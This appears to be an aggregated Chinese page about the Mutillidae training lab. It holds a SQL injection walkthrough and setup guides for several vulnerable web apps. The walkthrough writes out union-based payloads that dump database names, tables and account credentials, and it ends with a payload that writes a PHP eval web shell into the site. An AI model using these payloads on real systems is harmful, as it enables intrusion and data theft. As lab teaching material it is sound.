精华内容
下载资源
问答
  • 该指导书对每个页面存在漏洞进行了详细分类,对OWASP Top 10 应用安全风险-2017中的漏洞举例说明,结合靶机使用还不错。
  • OWASP Mutillidae II 漏洞靶场实验指导书汇总 OWASP Top 10 应用安全风险-2017 OWASP (Open Web Application Security Project)开放式 Web 应用程序 安全项目,是一个组织,它提供有关计算机和互联网应用程序的...
  • 请注意:Mutillidae已迁移到GitHub https://github.com/webpwnized/mutillidae
  • owasp-mutillidae-vagrant:在Ubuntu 16.04内安装OWASP Mutillidae 2的无用的虚拟机配置
  • 描述 Docker 容器。 快速开始 拉取数据库镜像: ...docker run --name=mutillidae -d --link=mysql:mysql -p 80:80 psoutham/mutillidae # Or, alternatively docker run --name=mutillidae --rm -it --link
  • Mutillidae web渗透平台

    2018-08-22 09:46:58
    一个适用于安全小白的web渗透演练平台,可以在其中尝试各类web渗透,目前为2.6.62版本
  • 环境: PHPstudy Mutillidae-2.7.11 将mutillidae级别调至最低 然后我们到mutillidae的注入点: OWASP 2017 --> ”A1 - Injection” —>> ”SQLi - Extract Data” —>> ”User Info” 须知 SQL注入...
    环境: PHPstudy     Mutillidae-2.7.11
    

    将mutillidae级别调至最低

    在这里插入图片描述然后我们到mutillidae的注入点:

    OWASP 2017 --> ”A1 - Injection” —>> ”SQLi - Extract Data” —>> ”User Info”

    须知

    SQL注入最重要的是寻找注入点,mutillidae 这里面的注入跟别的实际场景不一样,我们知道最常见的是去url上检测注入点。 当然像mutillidae 这样的构造的用户登陆的注入点检测也很多(常用的万能密码测试?)。只是目前自己遇到的还少。
    实际操作
    寻找注入点

    在用户信息界面:单引号检测Name对应表单,结果如下:

    通过这张图片我们就知道后端数据支撑的数据库类型是mysql了

    我们还可以尝试是否能列出所有用户信息: ‘ or 1=1 #
    结果我们得到了所有用户信息。(图略)
    猜解查询结果集字段

    我们使用如下语句:

     ’ order by 10 #   页面出错
     ’ order by 5  #   页面无数据
     ’ order by 7  #   页面无数据
     ’ order by 8  #   页面出错
    

    所以猜到查询结果集的列数为 7列
    猜数据库类型,链接用户,数据库名

    先用如下语句得到哪些字段可以用来显示数据:

    ' and 1=2 union select 1,2,3,4,5,6,7 #
    

    在这里插入图片描述
    然后构造语句:

    ' and 1=2 union select 1,user(),version(),database(),5,6,7 #
    

    然后我们就得到了如下信息

    Username=root@localhost
    Password=5.7.24
    Signature=mutillidae

    如果只有一个字段可以显示信息的,那么我们可以用concat_ws函数方便一次性得到数据

    ' and 1=2 union select 1,concat_ws(char(32,58,32),user(),database(),version()),3,4,5,6,7 #
    

    得到的信息如下:

    Username=root@localhost : mutillidae : 5.7.24
    Password=3
    Signature=4

    这下知道是mysql5以上的数据库,那么我们就可以直接利用系统库爆出一些信息
    获取所有的库名

    ' and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7 from information_schema.SCHEMATA  #
    

    得到的数据库名如下:

    information_schema
    dvwa
    library
    mutillidae
    mysql
    performance_schema
    sys
    website
    得到的数据库还是蛮多的,放在这儿,作为检测,这些都是可利用的信息,或许以后有用
    获取当前链接数据库下的所有表名

    ' and 1=2 union select 1,TABLE_NAME,3,4,5,6,7 from information_schema.TABLES where TABLE_SCHEMA=0x6d7574696c6c69646165#
    

    其中0x6d7574696c6c69646165是mutillidae的十六进制编码

    得到的表名如下:

    accounts
    balloon_tips
    blogs_table
    captured_data
    credit_cards
    help_texts
    hitlog
    level_1_help_include_files
    page_help
    page_hints
    pen_test_tools
    youtubevideos

    这表也是蛮多的,但是一般我们只需要我们有用的表就行,目前需要的是系统用户信息表,这里看就是accounts表了
    获取字段

    ’ and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7 from information_schema.COLUMNS where TABLE_NAME=0x6163636F756E7473 #

    其中0x6163636F756E7473是accounts的16进制编码
    

    得到的字段如下:

    cid
    username
    password
    mysignature
    is_admin
    firstname
    lastname
    USER
    CURRENT_CONNECTIONS
    TOTAL_CONNECTIONS

    获取字段值

    ' and 1=2 union select 1,username,password,mysignature,5,6,7 from accounts#
    

    你会发现这跟之前的万能密码爆出来的东西一样。 这大概就是mysql 5的注入获取数据的过程,
    获取websehll

    然后你需要找后台,找上传点,上传你的小马。或者试下下面简单快捷方法,写入一句话(需要你有写入权限)

    'union select 1,'<?php eval($_POST['cmd']);?>',3,4,5,6,7 into outfile 'D:\\study\\PHPstudy\\PHPTutorial\WWW\\mutillidae\\config.php'#
    
    展开全文
  • ErrorDocument 403 "By default, Mutillidae only allows access from localhost (127.*.*.*). Edit the .htaccess file to change this behavior (not recommended on a public network)." Order Deny,Allow #Deny...

    Kali Linux 安装

    一、官网下载Kali Linux镜像

    https://mirror-1.truenetwork.ru/kali-images/kali-2020.4/kali-linux-2020.4-installer-amd64.iso————将网址复制到迅雷即可下载

    二、在VMware workstation上安装Kali Linux

    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述在这里插入图片描述
    在这里插入图片描述

    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述在这里插入图片描述

    在Kali安装过程中并没有设置root密码,首次登录需要使用普通用户的身份登录,登陆后设置root密码
    在这里插入图片描述

    #在终端中输入如下命令进行root密码的设置
    ┌──(gzt㉿gzt)-[~/桌面]
    └─$ sudo su
    
    我们信任您已经从系统管理员那里了解了日常注意事项。
    总结起来无外乎这三点:
    
        #1) 尊重别人的隐私。
        #2) 输入前要先考虑(后果和风险)。
        #3) 权力越大,责任越大。
    
    [sudo] gzt 的密码:
    ┌──(root💀gzt)-[/home/gzt/桌面]
    └─# passwd root
    新的 密码:
    重新输入新的 密码:
    passwd:已成功更新密码
    #密码设置成功后注销用户,切换成root用户登录
    

    三、Kali 网络更新源配置文件 (/etc/apt/sources.list)

    #配置中国国内镜像源
    ┌──(root💀gzt)-[~/桌面]
    └─# vim /etc/apt/sources.list
    #中科大
    deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
    deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
    ##阿里云
    deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
    deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
    #清华大学
    deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
    deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
    

    四、Kali Linux更新

    apt软件包管理工具

    命令:

    #重新同步本地软件包索引文件和他们定义在/etc/apt/source.list目录下的资源:

    apt-get update

    #升级安装在kali上的有最新版本的软件包:

    apt-get upgrade

    #升级现所有安装在系统和相关位置的软件包,也可以从系统上移除淘汰的软件包:

    apt-get dist-upgrade

    #显示指定软件包的详细信息与依赖性:

    apt-cache show

    #移除软件包:

    apt-get remove

    #升级系统

    ####非常非常非常耗时间,请在非常非常非常空闲的时候进行升级
    ┌──(root💀gzt)-[~]
    └─# apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y  
    

    XAMPP安装

    安装环境:VMware workstation+Windows server 2008

    靶机下载:链接:https://pan.baidu.com/s/14PsTRLnoxK7DJwvQ5UTMEg
    提取码:qzzr

    一、将安装包复制到虚拟机中并双击安装在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

    在这里插入图片描述

    二、在浏览器登录在浏览器登录 phpMyAdmin,配置数据库管理员root密码在这里插入图片描述在这里插入图片描述在这里插入图片描述

    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    /* Authentication type and info */
    $cfg['Servers'][$i]['auth_type'] = 'config';
    $cfg['Servers'][$i]['user'] = 'root';
    $cfg['Servers'][$i]['password'] = 'gzt041057';#将刚设置好的密码填到此处
    $cfg['Servers'][$i]['extension'] = 'mysqli';
    $cfg['Servers'][$i]['AllowNoPassword'] = true;
    $cfg['Lang'] = '';
    
    

    在这里插入图片描述

    DVWA安装

    一、将DVWA安装包复制到D:\soft下并解压缩,将DVWA目录剪切到D:\xampp\htdos下在这里插入图片描述在这里插入图片描述在这里插入图片描述

    ......
    #Listen 12.34.56.78:80
    Listen 80
    Listen 192.168.22.100:101  #DVWA
    Listen 192.168.22.100:102  #mcir
    Listen 192.168.22.100:103  #pikachu
    Listen 192.168.22.100:104  #mutillidae
    Listen 192.168.22.100:105  #bwapp
    ......
    <VirtualHost *:101>
    	ServerAdmin MrGeng@163.com
    	DocumentRoot "D:/xampp/htdocs/dvwa"
    	ServerName 192.168.22.100
    	ErrorLog "logs/dvwa-error.log"
    	CustomLog "logs/dvwa-access.log"common
    </VirtualHost>
    

    在这里插入图片描述

    二、浏览器中搜索192.168.22.100:101,并做相应的修改在这里插入图片描述在这里插入图片描述

    #   See README.md for more information on this.
    $_DVWA = array();
    $_DVWA[ 'db_server' ]   = '127.0.0.1';
    $_DVWA[ 'db_database' ] = 'dvwa';
    $_DVWA[ 'db_user' ]     = 'root';
    $_DVWA[ 'db_password' ] = 'gzt041057';#修改数据库密码
    
    # Only used with PostgreSQL/PGSQL database selection.
    $_DVWA[ 'db_port '] = '3306';#修改端口号
    
    # ReCAPTCHA settings
    #   Used for the 'Insecure CAPTCHA' module
    #   You'll need to generate your own keys at: https://www.google.com/recaptcha/admin
    $_DVWA[ 'recaptcha_public_key' ]  = '6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb';
    $_DVWA[ 'recaptcha_private_key' ] = '6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K';
    #修改公钥与私钥
    
    :wq  #保存退出后刷新浏览器
    

    在这里插入图片描述在这里插入图片描述

    ......
    allow_url_include=On#将937行中的off改成on
    ......
    :wq  #保存退出后重启apache,刷新浏览器
    

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述

    安装MCIR

    一、将mcir安装包复制到D:/soft,然后解压剪切到D:/xampp/htdocs下

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    <VirtualHost *:102>
    	ServerAdmin MrGeng@163.com
    	DocumentRoot "D:/xampp/htdocs/mcir"
    	ServerName 192.168.22.100
    	ErrorLog "logs/mcir-error.log"
    	CustomLog "logs/mcir-access.log" common
    </VirtualHost>
    
    :wq  #保存退出后重启apache
    

    在这里插入图片描述

    二、浏览器访问192.168.22.100:102在这里插入图片描述

    在这里插入图片描述

    //Choose me for MySQL
    $dbtype = 'mysqli';
    $server = '127.0.0.1';
    $port = '3306';
    $username = 'root';
    $password = 'gzt041057';
    $database = 'sqlol';
    $persist = '';
    
    :wq
    

    在这里插入图片描述在这里插入图片描述

    安装Pikachu

    一、将Pikachu安装包复制到D:/soft,然后解压剪切到D:/xampp/htdocs下

    在这里插入图片描述在这里插入图片描述

    <VirtualHost *:103>
    	ServerAdmin MrGeng@163.com
    	DocumentRoot "D:/xampp/htdocs/pikachu"
    	ServerName 192.168.22.100
    	ErrorLog "logs/pikachu-error.log"
    	CustomLog "logs/pikachu-access.log" common
    </VirtualHost>
    
    :wq  #保存退出后重启apache
    

    在这里插入图片描述

    二、浏览器访问192.168.22.100:103

    在这里插入图片描述

    三、编辑 D:\xampp\htdocs\pikachu\inc\config.inc.php ,配置数据库连接、时区、默认字符集等

    在这里插入图片描述在这里插入图片描述

    <?php
    //全局session_start
    session_start();
    //全局居设置时区
    date_default_timezone_set('Asia/Shanghai');
    //全局设置默认字符
    header('Content-type:text/html;charset=utf-8');
    //定义数据库连接参数
    define('DBHOST', 'localhost');//将localhost修改为数据库服务器的地址
    define('DBUSER', 'root');//将root修改为连接mysql的用户名
    define('DBPW', 'gzt041057');//将root修改为连接mysql的密码,如果改了还是连接不上,请先手动连接下你的数据库,确保数据库服务没问题在说!
    define('DBNAME', 'pikachu');//自定义,建议不修改
    define('DBPORT', '3306');//将3306修改为mysql的连接端口,默认tcp3306
    
    ?>
    

    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述

    安装mutillidae

    一、将mutillidae安装包复制到D:/soft,然后解压剪切到D:/xampp/htdocs下

    在这里插入图片描述在这里插入图片描述

    <VirtualHost *:104>
    	ServerAdmin MrGeng@163.com
    	DocumentRoot "D:/xampp/htdocs/mutillidae"
    	ServerName 192.168.22.100
    	ErrorLog "logs/mutillidae-error.log"
    	CustomLog "logs/mutillidae-access.log" common
    </VirtualHost>
    
    :wq  #保存退出后重启apache
    

    在这里插入图片描述

    二、浏览器访问192.168.22.100:104在这里插入图片描述

    注:解决因PHP版本出现的故障:

    编辑D:\xampp\htdocs\mutillidae\owasp-esapi-php\lib\apachelog4php\trunk\src\main\php\helpers\LoggerPatternParser.php 第156行,将‘continue’改为 ‘continue 2’

    三、编辑D:\xampp\htdocs\mutillidae\includes\database- config.php。在这里插入图片描述

    <?php
    define('DB_HOST', '127.0.0.1');
    define('DB_USERNAME', 'root');
    define('DB_PASSWORD', 'gzt041057');
    define('DB_NAME', 'mutillidae');
    ?>
    

    四、编辑D:\xampp\htdocs\mutillidae.htaccess 调整访问权限。在这里插入图片描述

    ErrorDocument 403 "By default, Mutillidae only allows access from localhost (127.*.*.*). Edit the .htaccess file to change this behavior (not recommended on a public network)."
    Order Deny,Allow
    #Deny from all #注释掉
    
    ## This allows access from localhost
    Allow from all #添加
    #Allow from 127.  #注释掉
    #Allow from localhost  #注释掉
    
    ## This is to allow access from other machines on Virtual Box host-only networks.
    #Allow from 192.168.0.0/16  #注释掉
    
    
    

    五、修改后刷新页面——setup/reset the DB

    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述

    安装bWAPP

    一、将bWAPP安装包复制到D:/soft,然后解压剪切到D:/xampp/htdocs下在这里插入图片描述

    在这里插入图片描述

    <VirtualHost *:105>
    	ServerAdmin MrGeng@163.com
    	DocumentRoot "D:/xampp/htdocs/bwapp"
    	ServerName 192.168.22.100
    	ErrorLog "logs/bwapp-error.log"
    	CustomLog "logs/bwapp-access.log" common
    </VirtualHost>
    
    :wq  #保存退出后重启apache
    

    在这里插入图片描述

    二、浏览器访问192.168.22.100:105在这里插入图片描述

    三、编辑D:\xampp\htdocs\bWAPP\admin\settings.php,修改数据库密码在这里插入图片描述

    // Database connection settings
    $db_server = "localhost";
    $db_username = "root";
    $db_password = "gzt041057";
    $db_name = "bWAPP";
    
    

    四、浏览器访问http://192.168.22.100:105/install.php在这里插入图片描述

    在这里插入图片描述

    展开全文
  • OWASP Mutillidae Project

    2019-01-27 19:41:00
    https://github.com/webpwnized/mutillidae ... OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enth...

    https://github.com/webpwnized/mutillidae

    https://github.com/OWASP/DVSA

     

    OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. It is pre-installed on SamuraiWTF and OWASP BWA. The existing version can be updated on these platforms. With dozens of vulnerabilities a…

     

    OWASP Mutillidae II

     

    Project Announcements

     

    Tutorials

     

    Installation

    Video tutorials are available for each step. If you have a LAMP stack set up aleady, you might skip directly to installing Mutillidae.

    For detailed instructions, see the comprehensive guide

    Usage

    A large number of video tutorials are available on the webpwnized YouTube channel

    Features

    • Has over 40 vulnerabilities and challenges. Contains at least one vulnerability for each of the OWASP Top Ten 2007, 2010, 2013 and 2017
    • Actually Vulnerable (User not asked to enter “magic” statement)
    • Mutillidae can be installed on Linux or Windows *AMP stacks making it easy for users who do not want to install or administrate their own webserver. Mutillidae is confirmed to work on XAMPP, WAMP, and LAMP.
    • Preinstalled on Rapid7 Metasploitable 2, Samurai Web Testing Framework (WTF), and OWASP Broken Web Apps (BWA)
    • System can be restored to default with single-click of "Setup" button
    • User can switch between secure and insecure modes
    • Used in graduate security courses, in corporate web sec training courses, and as an "assess the assessor" target for vulnerability software
    • Updated frequently

    转载于:https://www.cnblogs.com/heycomputer/articles/10327727.html

    展开全文
  • mutillidae(owasp10)数据库报错 在虚拟机搭建好mutillidae环境后数据库爆出以下错误 我们可以将mutillidae对应的数据库改为owasp10 使用命令:sudo vim /var/www/mutillidae/config.inc 输入命令后会让输入密码,...

    mutillidae(owasp10)数据库报错

    在虚拟机搭建好mutillidae环境后数据库爆出以下错误
    在这里插入图片描述

    我们可以将mutillidae对应的数据库改为owasp10
    使用命令:sudo vim /var/www/mutillidae/config.inc
    输入命令后会让输入密码,密码可能是msfadmin或root,都尝试一下
    在这里插入图片描述
    找到$dbname变量,更改一下就可以了
    在这里插入图片描述
    回到页面刷新一下就可以了,如果刷新后还有问题清理一下浏览器的历史记录,重新进入一下
    仅供参考:我借鉴了其他博客解决的,所有自己也记录了一下!!

    展开全文
  • *:84> ServerAdmin zzq DocumentRoot "D:/xampp/htdocs/mutillidae" ServerName 192.168.118.6 ErrorLog "logs/mutillidae-error.log" Customlog "logs/mutillidae-access.log" common </virtualHost> 复制 ...
  • mutillidae实战(1)  第一次接触这个平台,打算使用这个平台进行一些web渗透演练,以此来加深下自己对web安全的理解。今天主要是完成的环境的搭建和基础sql注入的尝试,后续将完成更多渗透测试。 mutillidae 在 ...
  • 今天主要完成了对Add to blog页面的存储型XSS漏洞利用,利用其完成cookie窃取及利用、网页插入两个简单操作。另外在窃取cookie时,完成了服务器端asp文件的部署...mutillidae实战(1)-安装与简单的SQL注入    
  • linux上安装Mutillidae

    2018-06-13 23:25:26
    XAMPP:下载地址(https://www.apachefriends.org/download.html)Mutillidae:下载地址(http://sourceforge.net/projects/mutillidae/)首先安装XAMPP1. 下载完成2. cd Downloads3. chmod +x xampp-linux-x64-...
  • 搭建环境 phpstudy2016 虚拟机win2008 ...Mutillidae 链接:https://pan.baidu.com/s/1OoXdhOurpTWxWZzqoKNyFg 提取码:do3k 解压,将其移入至phpstudy 网站根目录下, 修改数据库配置文件 ...
  • mutillidae

    2014-07-18 14:59:00
    classes/BubbleHintHandler.php 有3处存在语法错误 BubbleHintHandler.php文件,... 第40行,$_SESSION["BubbleHintHandler"]["mDisplayHints"] = $pboolShow; 修改为$_SESSION["BubbleHintHandler"] ->mDispl...
  • 一组Vagrant和Ansible文件,它们在Kali Linux虚拟机中构建可完全运行的Mutillidae应用程序 Mutillidae网站 配置了虚拟主机和HTTPS证书的Apache Web服务器 MySQL数据库 OpenLDAP目录服务器 托管整个文件 实验文件 ...
  • **一 ,安装XAMPP软件,安装Gvim编辑器,... 表示安装成功 安装pikachu (皮卡丘) 点击红色字体 安装成功 安装 mutillidae 进入网址后按要求修改如下图 调整访问权限如下图 D:\xampp\htdocs\mutillidae\owasp-esapi-...
  • mutillidae靶机搭建 将mutillidae压缩包复制到虚拟机并解压,将mutillidae文件夹剪切到D:/xampp/htdocs/下 编辑xampp中Apache的配置文件 到最后追加 ServerAdmin caodabener DocumentRoot "D:/xampp/htdocs/...
  • 这里可以看到,在get中有这样的一长串字符,除此之外便没有其他参数有可能和CBC有关了,所以可以尝试修改整个参数来看看页面内容是否变化,以检查是否是这个参数,这里的话可能是因为现在的mutillidae的安全等级比较...
  • mutillidae靶场搭建

    2021-07-05 11:22:40
    mutillidae靶场搭建 下载许所需软件 mutillidae文件 phpstudy软件 下载完成后解压mutillidae文件到自定义的目录下 下载完成phpstudy后点击安装(怎么安装就不用我教了) 设置phpstudy 主要有四个步骤 设置阿帕奇 不用...
  • OWASP Mutillidae的安装

    千次阅读 2016-08-08 13:51:30
    OWASP Mutillidae介绍OWASP(Open Web Application Security Project)是一个开源的、非盈利性的全球性安全组织。由全球的会员共同推动安全标准、安全测试工具、安全指导手册等应用安全技术的发展。OWASP也有中国的...
  • 这里推荐使用OWASP提供的WebGoat、DVWA和Mutillidae来作为渗透测试环境,读者可以自行搜索这些软件的介绍。其实WebGoat、DVWA和Mutillidae都包含在OWASPBWA这个套件中,可以直接下载一个OWASPBWA虚拟机...
  • 此次练习主要是用mutillidae靶场实现了《白帽子讲web安全》上的xss payload 窃取用户cookie实例。 需要创建两个用户进行测试:墨中白,test 用账号墨中白进入xss blog练习页面: 在文本框中插入代码 &lt;...
  • define('DB_NAME', 'mutillidae'); 2、检查数据库端口 查看3306有没有被防火墙拦住了,放行3306端口 3、授权访问 #root -u root -p //登录 mysql> grant all privileges on *.* to root@localhost identified by '...
  • mutillidae实战(4)-burpsuite爆破登录

    千次阅读 2018-11-10 21:33:15
    使用burpsuite做了几个ctf题目,其中有获取base64解码后post的,也有直接抓包改包的,因为昨天有同学问到在mutillidae中进行爆破登录,所以今天也抓要对其进行一下爆破,做个记录。这里我之前已经安装好了burp...
  • Mutillidae setup

    2013-04-11 18:12:00
    SETTINGUPMUTILLIDAEINUBUNTU,BACKTRACK,BACKBOX,ETC.+MANUALSQLINJECTION ...Mutillidae is a free and open source web application for website penetration testing and hacking which was deve...
  • 废话不多说,先上链接 mutillidae2.6.48链接: https://pan.baidu.com/s/1hssyiVy 密码: pw67 phpstudy2016.exe链接: ... ...下载mutillidae2.6.48和phpstudy,安装并启动phpstudy,将mutillidae...
  • 先查看网页。这里大意就是,需要将用户ID和组ID都等于“000”才能成为root用户。...某个博主:mutillidae实战(3)-CBC反转提权 https://blog.csdn.net/weixin_41177699/article/details/83063101
  • 大家在使用...但是发现有一个叫owasp10的数据库,而且里面的信息正是我们需要的,所以我们可以将mutillidae对应的数据库改为owasp10; 更改数据库名很简单: 找到$dbname变量,更改一下就可以了:

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 510
精华内容 204
关键字:

Mutillidae